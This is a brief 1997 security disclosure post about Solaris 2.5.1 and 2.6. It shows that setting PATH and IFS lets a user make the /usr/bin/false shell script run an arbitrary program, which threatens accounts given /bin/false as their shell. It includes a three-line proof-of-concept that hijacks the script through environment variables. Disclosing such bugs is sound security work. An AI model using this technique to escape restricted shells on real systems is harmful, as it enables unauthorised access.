Buggy /usr/bin shell scripts

Sat, 06 Dec 1997 13:31:01 +0100

This is old news, but it seem to be around still.

Solaris 2.5.1 and 2.6:

$ ln -s /usr/bin/true /tmp/e
$ PATH=/tmp IFS=x /usr/bin/false
$ echo $?

This combined with the habit of giving non-login accounts /bin/false
as a shell feels dangerous.

Credits to Wilhelm Mueller for bringing it up in gnu.bash.bug in the
sense of a security related bug.